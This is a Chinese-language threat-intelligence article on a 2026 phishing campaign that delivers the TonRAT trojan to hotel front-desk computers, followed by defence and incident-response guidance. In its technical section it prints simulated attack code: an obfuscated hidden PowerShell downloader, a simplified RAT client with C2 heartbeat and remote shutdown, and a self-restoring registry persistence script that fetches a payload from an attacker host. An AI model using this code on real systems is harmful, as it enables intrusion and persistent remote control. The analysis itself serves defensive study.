摘要2026 年 4 月起欧亚酒店服务业爆发定向大规模钓鱼攻击攻击者依托 Calendly 邮件通知链路完成认证洗钱完整绕过 SPF、DKIM、DMARC 三层邮件域名校验以客诉、客房虫害、卫生检查等场景化邮件诱导前台终端下载 photo 系列 ZIP 压缩包。压缩包内含伪装图片的.png.lnk恶意快捷方式执行后调用经过 7 轮迭代 BigInt 算术混淆的 PowerShell 脚本解码恶意地址落地官方原版 Node.js v24.13.0 运行时并加载 TonRAT 远控木马第二波变种新增.NET 动态编译 DLL 中间载荷进一步提升免杀能力。该攻击最核心技术特征为双注册表循环持久化机制HKCU\Run 实现 Node.js 开机自启HKCU\RunOnce 执行后自动刷新自身驻留项形成恢复闭环单一防护规则拦截任意一条路径均无法根除感染。TonRAT 依托非标端口建立 C2 加密心跳通道内置无头浏览器地理采集、强制终端关机等破坏功能攻击者长期潜伏内网但暂未观测到批量数据窃取、勒索加密行为。本文完整拆解认证洗钱投递链路、多级跳转反分析站点、Lnk-PowerShell 混淆载荷链、Node.js TonRAT 通信、双注册表循环持久化五大核心技术模块配套恶意 Lnk 调用脚本、BigInt 解码 PowerShell、TonRAT 简化通信三段可复现代码示例系统分析酒店前台终端传统邮件、终端 EDR、内网边界、人员安全四层防护体系结构性短板。反网络钓鱼技术专家芦笛指出本次攻击将 SaaS 平台邮件洗白、多层代码混淆、双路径循环持久化三类对抗技术融合传统静态特征查杀、单一注册表监控规则完全失效文旅接待行业需重构全链路动态风险检测体系。论文结合酒店前厅业务场景构建分层协同防御架构与标准化感染处置流程全部论据依托 SecurityAffairs 披露的微软威胁情报形成闭环为连锁酒店、民宿等文旅机构应对同类高级持久化钓鱼攻击提供完整技术参考。关键词网络钓鱼认证洗钱Lnk 恶意快捷方式PowerShell BigInt 混淆TonRAT双注册表持久化酒店终端安全1 引言酒店、民宿等文旅接待机构前台终端承载客房预订、住客信息登记、客户投诉处理、线下结算等核心业务设备长期接收外部合作方、客户邮件前台工作人员受业务时效、门店声誉压力影响对陌生附件、外部链接安全警惕性普遍偏低持续成为定向网络钓鱼攻击高价值目标。2026 年针对酒店行业的钓鱼攻击呈现明显技术升级特征攻击者不再依赖简单域名仿冒转而复用 Calendly、Google、Cloudflare 等正规云服务基础设施完成邮件身份洗白依靠平台原生邮件签名与域名校验机制规避邮件网关拦截载荷链路抛弃传统 Office 宏、独立 PE 木马采用 “快捷方式 PowerShell 多层混淆 合法 Node.js 运行时 远控 JS” 无文件混合攻击链大幅降低静态查杀检出率驻留机制创新采用可自刷新的 RunOnce 循环持久化形成故障自愈式后门显著提升安全事件处置难度。SecurityAffairs 于 2026 年 6 月 27 日发布微软威胁情报专项分析报告完整披露自 2026 年 4 月持续活跃的酒店 Photo-ZIP 钓鱼团伙活动攻击覆盖日本、丹麦、荷兰多国酒店目标设备命名集中为 reception、frontdesk、reservations 等前台岗位终端邮件诱饵同步提供日语、丹麦语、荷兰语多语言版本依托海量企业邮箱列表批量群发无定制化鱼叉钓鱼特征。团伙持续迭代 PowerShell 混淆手段在投放周期内完成 7 轮 BigInt 算术混淆逻辑迭代底层载荷执行逻辑保持不变仅调整编码混淆规则规避安全厂商特征库更新第二波攻击新增 csc.exe、cvtres.exe 动态编译.NET DLL 中间载荷进一步拉长攻击链路、增加静态检测难度。TonRAT 木马落地后构建两条独立注册表开机启动路径RunOnce 条目每次执行自动重写自身键值形成循环恢复机制即便终端杀毒拦截 Node.js 主程序另一路注册表启动项仍可重新下载完整恶意载荷恢复受控状态。现有网络安全研究多独立分析 SaaS 平台邮件钓鱼、PowerShell 代码混淆、Windows 注册表持久化单一技术点针对酒店行业定向、融合多重对抗手段、具备自愈式双路径持久化的复合型 TonRAT 攻击活动缺乏完整全链路技术拆解与适配文旅行业的落地防御方案。当前酒店安全建设普遍存在认知偏差认为启用邮件域名认证、终端杀毒软件即可抵御钓鱼入侵忽略 SaaS 平台认证洗钱带来的邮件放行漏洞、合法 Node.js 运行时加载恶意脚本的白利用风险、循环持久化后门的处置盲区。本文以 SecurityAffairs 公开威胁情报为核心事实依据客观还原从邮件投递、多级跳转钓鱼站点、恶意快捷方式触发、混淆 PowerShell 解码、Node.js TonRAT 驻留、双注册表循环持久化完整攻击链路针对各环节技术原理配套可复现代码客观梳理传统防护体系失效诱因构建适配酒店前台业务场景的多层防御方案全文无夸大化威胁描述、无口号式安全倡议全部论点依托攻击样本行为、终端业务运行特征形成完整论据闭环。反网络钓鱼技术专家芦笛强调该团伙代表 2026 年线下服务业高级钓鱼攻击主流演进方向依托正规云服务、合法开源程序、循环持久化后门构建多层对抗体系单一单点防护设备无法形成有效拦截安全运营必须转向邮件 - 终端 - 内网联动的动态行为监测模式。2 攻击活动整体画像与团伙基础行为特征2.1 攻击投放周期、地域与目标终端特征本次 Photo-ZIP 钓鱼攻击自 2026 年 4 月启动监测周期至 6 月下旬持续稳定投放无衰减迹象。攻击地理范围分为两大核心区域亚洲以日本连锁酒店、民宿为主欧洲覆盖丹麦、荷兰中小型度假酒店、接待机构诱饵邮件中日文样本投放量占全部邮件总量最高比例。攻击者精准锁定酒店前厅岗位终端微软捕获的失陷设备主机名包含多语种前台标识英文 reception、frontdesk、reservations法语 accueil波兰语 recepcja捷克语 recepce证明团伙针对酒店前台岗位做定向筛选清楚前台员工处理客诉、卫生检查类邮件时易放松安全校验。攻击采用广撒网批量投递模式邮件主题、正文不标注酒店名称、收件人姓名依托商业企业邮箱列表批量发送不属于精准定制鱼叉钓鱼依靠场景化声誉施压诱饵提升打开与附件解压概率。2.2 社会工程诱饵心理诱导逻辑所有钓鱼邮件显示发件人为 “Booking Manager (via Calendly)”借助 Calendly 商务预约工具的可信身份降低戒备正文统一使用声誉胁迫类话术覆盖五类酒店高频业务场景客房床虫虫害预警、文旅监管卫生突击检查、住客批量投诉举证、预订纠纷书面警告、门店运营暂停风险通知。上述场景直接关联酒店经营考核、客户流失风险前台员工为避免门店处罚、客户投诉升级会快速点击邮件内链接下载图片附件跳过发件来源核验、附件安全扫描流程。反网络钓鱼技术专家芦笛指出文旅行业钓鱼诱饵具备极强岗位绑定属性普通企业通用诈骗邮件难以形成同等心理压迫前台员工在日常业务压力驱动下人为漏洞成为攻击最易突破的入口。2.3 投递链路双分支架构与反分析设计团伙设计两套并行投递链路Variant A 直接 Calendly 链路、Variant B Google 共享中转链路轮换投放规避单一投递渠道被批量封禁Variant ACalendly 原生通知链接直接跳转四层 302 跳转链路 calendly 链接→share.google→谷歌域名→Cloudflare 加速.cfd 恶意域名该链路完整通过 SPF/DKIM/DMARC 校验邮件网关判定为可信服务商邮件直接放行Variant B依托 share.google 多轮换 Token 中转每 2-3 天轮换共享 Token、恶意.cfd 域名邮件 SPF 软失败但依靠 Google 域名中转降低浏览器告警概率。恶意站点前端部署 Cloudflare Turnstile 人机验证承担双重功能一是过滤安全厂商自动化沙箱、爬虫无法人工完成滑块验证则不提供 ZIP 载荷下载二是简易地理过滤针对目标投放区域以外 IP 限制访问减少样本泄露。压缩包统一命名 photo - 数字.zip内部快捷方式分两波变种Wave1 为 IMG-xxx.png.lnkWave2 为 PHOTO-xxx.png.lnk文件体积稳定在 1989~2079 字节证明团伙使用统一载荷生成工具批量制作。2.4 攻击技术迭代与未知威胁研判团伙在持续投放周期内完成 7 轮 PowerShell BigInt 混淆逻辑迭代底层载荷下载、Node.js 落地、TonRAT 加载核心执行逻辑完全不变仅调整算术编码混淆规则针对性规避静态关键词匹配检测Wave2 阶段新增 csc.exe、cvtres.exe 动态编译随机命名.NET DLL 作为中间过渡载荷微软监测数据未观测到该 DLL 被主动加载判断为条件触发前置模块用于进一步混淆终端行为日志。终端失陷后观测到的恶意行为包含非标端口 C2 心跳上报、无头 Chrome 浏览器采集终端公网 IP 与地理位置、执行强制关机命令cmd /c shutdown -s -t 0但截至 2026 年 6 月下旬微软未捕获批量客户隐私窃取、勒索文件加密、横向渗透财务服务器等明确行为团伙最终攻击目标暂无定论。从技术投入规模判断攻击者投入大量资源优化免杀、循环持久化、通信隐蔽能力长期潜伏意图明确后续存在迭代载荷实施数据盗取、勒索攻击的潜在风险。本次攻击最大处置难点为双注册表自愈持久化单一驻留路径被清除后另一路径自动重新生成完整恶意文件目录常规终端一键杀毒、简易清理脚本无法彻底根除感染大幅提升安全事件处置工作量与残留感染风险。3 攻击全链路分层技术拆解与代码示例完整攻击链路分为六大递进执行环节①Calendly 邮件认证洗钱批量投递钓鱼邮件②多级 302 跳转至 Cloudflare 防护恶意站点Turnstile 人机验证拦截自动化分析③诱导下载 photo 命名 ZIP 压缩包内含伪装图片 lnk 快捷方式④双击 lnk 触发隐藏窗口 PowerShell执行 7 轮迭代 BigInt 算术混淆脚本解码恶意下载地址⑤远程拉取二级 ps1 脚本Wave2 新增.NET 动态编译 DLL 中间载荷落地官方 Node.js v24.13.0 至用户目录⑥运行 TonRAT 远控 JS 木马写入 HKCU\Run、HKCU\RunOnce 双注册表自启动项RunOnce 每次执行自动刷新驻留键值形成自愈闭环建立非标端口加密 C2 通信。本章逐层拆解各环节技术原理、对抗防护机制配套三段可复现代码还原核心恶意逻辑。3.1 Calendly 认证洗钱Authentication Laundering邮件逃逸技术传统钓鱼邮件直接伪造企业域名发件人SPF 校验失败会被邮件网关拦截本次攻击创新利用第三方 SaaS 服务商邮件基础设施完成身份洗白邮件三层域名认证全部通过直接进入收件箱不标记垃圾邮件。3.1.1 认证洗钱完整实现流程攻击者注册合法 Calendly 账号创建公开预约表单配置通知邮件转发至目标酒店企业邮箱批量构造客诉、卫生检查类钓鱼正文嵌入多级 302 跳转链接由 Calendly 官方服务器发送通知邮件邮件头 SPF 记录校验 Calendly 官方发送 IP、DKIM 使用 Calendly 私钥签名、DMARC 校验域名合规三层认证全部放行邮件内置链接不直连恶意域名经过 Calendly、share.google、谷歌短链接多层合法域名中转降低浏览器安全告警终点为新注册 Cloudflare 加速.cfd 域名前置 Turnstile 人机验证阻断安全厂商沙箱自动获取恶意 ZIP 样本。3.1.2 传统邮件防护失效根源主流邮件安全网关仅校验发件域名 SPF/DKIM/DMARC 合规性未深度解析邮件内多级跳转链路风险企业运维普遍将 Calendly、Google 协作域名加入全局可信白名单所有服务商通知邮件无条件放行完全忽略内部跳转至恶意站点的风险。反网络钓鱼技术专家芦笛强调SaaS 平台全局白名单策略是当前邮件防护体系典型结构性漏洞认证洗钱类钓鱼正是利用该漏洞大规模传播。3.2 恶意 Lnk 快捷方式触发隐藏 PowerShell 载荷Windows 系统默认隐藏文件扩展名前台终端普遍开启 “隐藏已知文件类型扩展名”员工仅可见 IMG-xxx.png 图片标识无法识别后缀.lnk 快捷方式双击静默后台执行 PowerShell无弹窗、无可视化异常。3.2.1 Lnk 内置执行参数模拟代码攻击者将快捷方式目标字段设置为隐藏窗口 PowerShell 调用内嵌 Base64 编码混淆命令规避静态关键词检测还原原始调用字符串逻辑powershell# Lnk快捷方式内置完整执行参数powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand Base64编码混淆载荷字符串-WindowStyle Hidden 参数实现全程后台静默运行前台员工无法察觉脚本执行-ExecutionPolicy Bypass 绕过系统默认 PowerShell 脚本执行限制无需管理员权限即可运行远程下载脚本。3.2.2 BigInt 大整数算术解码核心代码示例团伙 7 轮迭代全部基于 BigInt 超大整数运算混淆恶意 C2 与下载地址规避 URL 明文特征匹配解码逻辑模拟代码powershell# PowerShell BigInt算术混淆解码核心片段# 攻击者加密后的超大数字字符串$cipherBigNum [bigint]::Parse(9274610938572649102746193850174629)# 内置固定解密密钥$decryptKey [bigint]8642013579# 按位异或算术运算解码原始字节流$rawByteData $cipherBigNum -bxor $decryptKey# 转换为UTF8字符串获取恶意远程下载地址$byteArray [System.BitConverter]::GetBytes([long]$rawByteData)$downloadUrl [System.Text.Encoding]::UTF8.GetString($byteArray)# 远程拉取二级PowerShell脚本至%TEMP%目录Invoke-WebRequest -Uri $downloadUrl -OutFile $env:TEMP\update.ps1 -UseBasicParsing常规静态杀毒仅匹配明文恶意域名、IP无法识别经过 BigInt 算术加密后的隐藏地址是该载荷绕过终端静态检测的核心手段。3.3 Node.js 无系统安装落地与 TonRAT 远控木马实现二级 PowerShell 脚本自动从nodejs.org官网下载原版 Node.js v24.13.0 压缩包解压至%LOCALAPPDATA%\Nodejs用户目录无需管理员权限、无需全局系统安装依托合法白文件运行恶意 JS 植入程序 TonRAT。3.3.1 TonRAT 木马网络通信行为特征C2 域名解析依托外部 API 动态获取控制域名规避静态域名黑名单拦截通信端口固定使用非标端口 8443、8445、8453、5555、56001~56003避开常规 80/443 网页端口终端信息采集启动无头 Chrome--headless --no-sandbox访问ip-api.com获取公网 IP、地理位置、运营商信息加密上传至攻击者服务器破坏指令接收指令后执行cmd /c shutdown -s -t 0实现终端无倒计时强制关机中断前台业务、掩盖恶意操作痕迹。3.3.2 TonRAT 简化通信模拟 JS 代码示例保留区块链域名解析、WebSocket 加密心跳、关机指令三大核心功能移除窃取数据恶意模块用于安全实验室复现研究// TonRAT远控木马简化模拟代码const https require(https);const WebSocket require(ws);const { exec } require(child_process);// 请求外部API获取动态C2域名async function fetchC2Domain() {return new Promise((resolve) {https.get(https://public-api.example/c2-list, (res) {let buf ;res.on(data, chunk buf chunk.toString());res.on(end, () {const domainList JSON.parse(buf);resolve(domainList[0]);});});});}// 建立加密WebSocket长连接心跳上报终端信息async function connectControlServer() {const targetDomain await fetchC2Domain();const wsClient new WebSocket(wss://${targetDomain}:8443/secret-channel);wsClient.on(open, () {// 30秒周期上报终端基础信息setInterval(() {const deviceInfo Buffer.from(JSON.stringify({user: process.env.USERNAME,localPath: process.env.LOCALAPPDATA})).toString(base64);wsClient.send(deviceInfo);}, 30000);});// 接收攻击者下发控制指令wsClient.on(message, (cmdBuffer) {const cmdText Buffer.from(cmdBuffer, base64).toString();if (cmdText force_shutdown) {exec(cmd /c shutdown -s -t 0);}});}// 启动远控通信逻辑connectControlServer();3.4 双注册表循环自愈持久化机制攻击核心技术难点该攻击区别于传统单一注册表自启动后门设计两条独立、可互相恢复的驻留路径单一清理无法根除感染是处置工作最大技术障碍。持久路径 1HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run键值指向%LOCALAPPDATA%\Nodejs\node.exe加载 TonRAT.js用户登录自动启动远控木马长期维持受控状态持久路径 2HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce键值指向 ProgramData 目录下 PowerShell 恢复脚本该脚本每次执行完成后自动重写 RunOnce 自身键值形成循环刷新机制不会执行一次后自动删除。微软实测验证若 EDR 拦截 Node.exe 程序仅清除 Run 路径注册表项RunOnce 循环脚本重启后会重新下载完整 Node.js 运行时、TonRAT 载荷恢复全部恶意文件与驻留项只有同步删除两处注册表键值、本地 Nodejs 目录、临时 PowerShell 脚本三类文件才能彻底清除感染。3.4.3 循环刷新 RunOnce 驻留脚本模拟代码powershell# RunOnce自愈刷新脚本核心逻辑# 1. 重新下载完整Node.js运行时与TonRAT脚本$restoreUrl https://attacker-cfd-domain/file/nodejs-pack.zipInvoke-WebRequest -Uri $restoreUrl -OutFile $env:ProgramData\node-pack.zip -UseBasicParsing# 解压至本地用户目录Expand-Archive -Path $env:ProgramData\node-pack.zip -DestinationPath $env:LOCALAPPDATA\Nodejs -Force# 2. 重写HKCU\Run Node.js自启动项reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NodeRuntime /t REG_SZ /d $env:LOCALAPPDATA\Nodejs\node.exe TonRAT.js /f# 3. 重写自身RunOnce键值实现下次登录再次执行自愈逻辑reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v RecoverPayload /t REG_SZ /d powershell $env:ProgramData\recover.ps1 /f3.5 Wave2 变种.NET 动态编译中间载荷逻辑第二波攻击在 PowerShell 与 Node.js 之间新增 csc.exe、cvtres.exe 动态编译流程生成 3072 字节随机命名 DLL 文件作为过渡载荷微软观测日志未发现该 DLL 主动加载行为判定为条件触发前置模块用于拉长攻击链路、增加终端行为审计识别难度进一步规避 EDR 行为规则匹配。4 酒店行业传统安全防护体系失效分析结合本次攻击完整技术链路从邮件网关、终端 EDR、内网边界、人员安全运营四个维度系统拆解文旅酒店现有安全架构存在的结构性缺陷。4.1 邮件网关防护短板SaaS 服务商全局可信白名单漏洞Calendly、Google 等协作域名永久放行未开启邮件内多级跳转链路深度解析无法识别跳转至 cfd 恶意域名的风险附件检测规则缺失对 photo-*.zip 命名压缩包、内部包含.png.lnk 快捷方式的组合场景无专项拦截规则默认判定为普通图片附件无动态沙箱解析能力仅扫描附件静态文本无法执行内嵌 PowerShell 脚本、识别 BigInt 编码隐藏 URL多语言场景化诱饵无关键词匹配库未针对日文、丹麦语、荷兰语客诉、卫生检查类钓鱼话术配置风险告警。反网络钓鱼技术专家芦笛提出现阶段酒店邮件防护普遍存在 “重发件认证、轻附件与跳转链路深度检测” 的失衡问题针对 SaaS 认证洗钱类钓鱼必须取消全局白名单启用全链路跳转解析与附件动态沙箱。4.2 前台终端 EDR 静态检测机制缺陷合法程序白利用无行为监控Node.js 为官方开源程序无恶意 PE 特征EDR 静态库无法识别 node.exe 加载未知恶意 JS 脚本的异常行为PowerShell 高风险参数监控宽松前台业务放开 Bypass、EncodedCommand、Invoke-WebRequest 等高风险指令无实时阻断告警注册表双路径驻留无审计未监控 HKCU\Run、HKCU\RunOnce 新增未知键值无法捕捉循环自愈后门写入行为非标端口外联无阻断防火墙仅拦截勒索、远控通用端口8443、5555、56001~56003 等木马专用端口完全放行文件扩展名管控缺失未通过组策略强制关闭 “隐藏已知文件扩展名”员工无法直观识别 lnk 恶意快捷方式。4.3 酒店内网边界防护漏洞前台终端与财务服务器无 VLAN 隔离前台失陷后木马可横向扫描内网存在窃取支付、住客隐私数据风险新注册 Cloudflare .cfd、xyz 低价域名无全局拦截策略出站流量无动态 C2 域名审计无法阻断终端访问外部 API 拉取动态远控域名Turnstile 人机验证站点无特征拦截规则边界设备无法识别钓鱼站点人机验证标识。4.4 酒店人员安全培训适配性不足现有安全培训案例多为通用中奖、银行诈骗钓鱼缺少酒店客诉、卫生检查场景专项模拟演练前台员工无标准化附件核验流程工作压力下优先处理业务而跳过安全校验人为漏洞持续存在。5 分层协同防御体系与感染标准化应急处置方案针对本次攻击认证洗钱、多层混淆、双路径循环持久化、Node.js 白利用四大核心技术特征构建邮件网关、终端 EDR、内网边界、人员安全四层联动防御架构配套 TonRAT 感染终端标准化全流程处置方案。5.1 邮件网关层面防御优化策略取消 Calendly、Google 协作域名全局白名单对所有第三方 SaaS 通知邮件强制开启多级跳转链路解析链路终点为 7 日内新注册.cfd、xyz 域名、Cloudflare 匿名节点直接隔离邮件仅内部备案业务联系人发送的 Calendly 通知可人工放行。新增 Photo-ZIP 与 Lnk 组合附件拦截规则全局拦截命名包含 photo、IMG、PHOTO 关键词的 ZIP 压缩包沙箱扫描压缩包内部文件检测到.lnk快捷方式直接隔离销毁附件阻断载荷投递入口。开启附件动态沙箱执行检测沙箱模拟执行内嵌 PowerShell 脚本识别 BigInt 超大整数运算、远程 URL 下载、Base64 编码混淆等高风险行为匹配后标记高危钓鱼邮件并推送管理员预警。多语言酒店场景诱饵关键词库配置添加日文、丹麦语、荷兰语客诉、虫害、卫生检查、门店处罚类关键词正文匹配相关话术自动弹窗风险提示限制员工一键打开附件权限。5.2 前台终端 EDR 与系统安全加固方案限制 PowerShell 高危参数执行域组策略禁用-ExecutionPolicy Bypass、-EncodedCommand、Invoke-WebRequest远程下载指令仅开放前台业务必需基础 PowerShell 功能监控 csc.exe、cvtres.exe 动态编译未知 DLL 行为并实时阻断。注册表双路径实时审计告警EDR 配置注册表监控规则HKCU\Run、HKCU\RunOnce 新增未知键值立即弹窗告警自动阻断脚本写入驻留项拦截循环自愈后门创建。终端防火墙全局封禁木马非标通信端口批量阻断 8443、8445、8453、5555、56001、56002、56003 出站流量切断 TonRAT 与 C2 服务器心跳通信通道。强制关闭系统隐藏文件扩展名通过域组策略统一修改文件资源管理器配置完整显示.lnk 快捷方式后缀从视觉层面降低误点击概率。监控用户目录 Node.js 异常落地行为EDR 实时监控%LOCALAPPDATA%\Nodejs目录新增文件、node.exe 加载未知 JS 脚本行为自动终止进程并隔离恶意文件。5.3 内网边界网络安全管控措施前台业务终端与财务机房 VLAN 逻辑隔离划分独立业务网段前台终端无主动访问财务数据库、服务器路由权限即便终端受控也无法横向渗透窃取敏感数据。全局拦截低价临时域名后缀边界防火墙策略禁止终端访问.cfd、.xyz、.top 等低价新注册域名后缀大幅缩减攻击者可利用钓鱼站点域名池。出站 API 访问行为审计监控终端主动访问外部域名解析 API、区块链 API 流量拦截用于拉取动态 C2 地址的网络请求对 Cloudflare Turnstile 人机验证页面访问行为标记风险告警。5.4 文旅行业定制化人员安全运营机制月度酒店场景钓鱼模拟演练批量投放伪装客诉、卫生检查的仿真钓鱼测试邮件统计前台员工打开附件、点击外部链接行为针对高风险岗位开展一对一专项安全培训。标准化前台邮件处理操作规范制定门店安全制度陌生客户投诉、外部检查类邮件一律通过酒店官方预订系统核验工单禁止直接下载邮件附件所有图片压缩包附件必须提交运维岗扫描核验后再查看。建立钓鱼事件快速上报通道前台发现可疑 ZIP 附件、仿图片快捷方式、终端异常强制关机时第一时间断开终端网线并上报安全运维避免木马横向扩散。5.5 TonRAT 双持久化感染终端标准化应急处置流程若确认前台终端触发本次攻击完整感染严格按照以下步骤同步清除两条驻留路径杜绝自愈复发物理断开终端网线隔离内网阻断 TonRAT 向 C2 服务器上传终端信息、接收控制指令任务管理器结束全部 node.exe、powershell、csc.exe 后台进程终止恶意脚本运行清理本地恶意文件目录删除%LOCALAPPDATA%\Nodejs完整文件夹、%TEMP%目录所有未知 ps1 脚本、%ProgramData%下 node-pack.zip、recover.ps1 恢复脚本删除两处注册表驻留项HKCU\Software\Microsoft\Windows\CurrentVersion\Run 下 NodeRuntime 键值HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 下 RecoverPayload 自愈键值全盘检索 photo-.zip、.png.lnk 恶意文件全部隔离删除修改终端本地账户、酒店预订系统、后台管理平台全部登录凭证检索企业邮件日志排查该终端账户是否向内部同事转发同源钓鱼邮件同步通知相关员工自查提取终端进程日志、注册表变更日志、邮件日志完成攻击取证同步下发加固组策略、EDR 拦截规则终端完成全量安全扫描后重新接入内网持续 72 小时监控终端出站非标端口流量、注册表新增启动项行为确认无自愈复发风险。6 讨论本次 2026 年欧亚酒店 Photo-ZIP TonRAT 攻击集中体现当前面向线下服务业高级钓鱼攻击三大核心演进趋势其一投递链路全面复用合规 SaaS 云服务完成认证洗钱从底层绕过邮件域名三层认证防护邮件网关无法依靠传统发件人校验拦截其二载荷链路采用合法开源程序白利用、多层算术代码混淆、.NET 中间过渡 DLL 多重对抗手段彻底规避基于静态特征、文件哈希的终端查杀其三驻留机制创新可自刷新 RunOnce 循环持久化构建双路径自愈后门大幅提升安全事件处置难度单一清理操作无法根除感染。从行业横向对比来看酒店、民宿、景区接待机构相比金融、大型政企存在显著安全短板安全预算有限、邮件网关、终端 EDR 配置简化无专职安全运维人员前台员工安全培训频次不足设备长期暴露外部邮件环境攻击暴露面远高于其他行业。反网络钓鱼技术专家芦笛指出同类攻击会持续向餐饮、零售、线下服务行业扩散攻击者持续迭代 PowerShell 混淆逻辑、拓展更多 SaaS 平台用于认证洗钱仅依靠邮件域名认证、静态病毒库的传统防护体系将持续失效。现有安全检测技术存在固有局限基于文件扩展名、静态字符串、哈希值的特征匹配仅能拦截已知攻击样本针对 BigInt 算术混淆、合法 Node.js 加载恶意脚本、循环自愈注册表后门的未知变种必须转向进程行为审计、注册表实时监控、全链路流量解析的主动防御思路。酒店行业不能仅依赖终端杀毒软件必须搭建邮件 - 终端 - 内网三层联动风险检测体系配套贴合门店业务场景的常态化钓鱼演练降低社会工程诱饵带来的人为突破概率。当前该团伙最终攻击目标尚未完全明确微软安全团队未观测到批量住客数据泄露、勒索软件加密行为存在两种潜在演化方向一是长期潜伏内网持续采集客户身份、支付隐私数据打包在黑产平台交易牟利二是迭代 TonRAT 载荷新增勒索加密模块针对连锁酒店集团发起规模化勒索攻击。后续安全运营需持续监测 photo 命名 ZIP 附件、.cfd 临时域名、8443/56001 非标端口外联流量、RunOnce 新增未知启动项四大 IoC 指标跟踪团伙混淆逻辑与持久化手段迭代动向及时同步更新邮件、终端检测规则。7 结语本文以 SecurityAffairs 2026 年 6 月 27 日披露的酒店 Photo-ZIP TonRAT 持久化钓鱼威胁情报为核心研究基础完整拆解 Calendly 认证洗钱邮件投递、Google 多级跳转反分析站点、伪装图片 Lnk 快捷方式、7 轮迭代 BigInt PowerShell 混淆、无安装 Node.js TonRAT 远控、双注册表循环自愈持久化全攻击技术链路配套三段可复现代码还原恶意解码、木马通信、驻留自愈核心逻辑系统分析邮件、终端、内网、人员四层传统防护架构的失效根源针对性构建适配酒店前台业务场景的分层协同防御策略与标准化感染应急处置流程。本次攻击充分证明融合 SaaS 认证洗钱、多层代码混淆、合法程序白利用、自愈式双路径持久化的复合型钓鱼攻击已成为文旅接待行业突出网络安全风险单一邮件防护或终端杀毒无法形成完整拦截闭环。反网络钓鱼技术专家芦笛强调线下服务业网络安全建设需完成防护思路转型从 “基于已知恶意特征拦截威胁” 转向 “全链路动态行为识别未知威胁”同步结合门店业务场景完善常态化人员安全运营机制平衡前台业务便捷性与终端安全管控强度。编辑芦笛公共互联网反网络钓鱼工作组